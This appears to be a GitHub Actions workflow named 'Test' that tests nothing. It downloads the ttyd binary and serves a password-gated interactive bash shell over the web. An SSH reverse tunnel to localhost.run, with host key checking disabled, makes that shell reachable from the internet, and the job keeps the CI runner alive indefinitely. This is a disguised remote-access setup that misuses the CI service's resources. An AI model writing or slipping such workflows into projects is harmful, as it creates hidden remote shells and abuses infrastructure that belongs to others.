name: Test

on:
#  schedule:
#  - cron: "*/10 * * * *"    # Every 30 minutes

  workflow_dispatch:
  
jobs:
  tag:
    name: Test
    runs-on: ubuntu-latest
    steps:
      - name: Test.
        id: check
        shell: bash
        run: |
         wget "https://github.com/tsl0922/ttyd/releases/download/1.6.3/ttyd.x86_64" &>/dev/null
         mv ttyd.x86_64 ttyd
         chmod a+x ttyd
         #sudo npm install -g localtunnel &>/dev/null
         setsid -f &>/dev/null ./ttyd &>/dev/null -t rendererType=webgl -t fontSize=20 -p 9568 bash -c 'while true;do echo -ne "\000";sleep 20;done & echo -n "Password: ";read -sr p;[ "$(sha256sum <<<$p)" == "9baa30f3c6752b15e29853f8ffbc534cabcfaf873aec52aa3a1864a501f0c925  -" ] && ( clear;exec bash -i )' || exit 0  &
         sleep 10
         #setsid -f lt -p 9568 &
         setsid -f ssh -o "StrictHostKeyChecking=no" -R 80:localhost:9568 nokey@localhost.run
         sleep infinity || true
         exit 0
